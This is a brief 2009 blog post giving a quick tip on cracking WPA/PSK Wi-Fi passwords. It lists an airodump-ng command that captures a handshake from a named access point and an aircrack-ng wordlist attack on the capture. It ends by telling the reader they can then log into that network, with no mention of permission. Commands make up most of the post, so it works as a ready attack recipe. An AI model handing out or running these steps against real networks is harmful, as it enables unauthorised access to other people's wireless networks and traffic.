Sunday, June 28, 2009

Cracking PSK

Just thought of posting a quick tip and way on cracking WPA/PSK passwords.

airodump-ng --channel 11 --bssid 00:14:BF:A9:F7:E7 -w ~/linksys

this will start to capture packets. We only need ONE handshake! look at the data# tab and after it reaches around 200kb you can safly abort.You don't need to be associated with any network. Next you crack with aircrack-ng

aircrack -w /pentest/paswords/jrt/passlist ~/linksys*

That's it you will wait for the password to be cracked. Then you'll be able to log into that network

No comments:

Post a Comment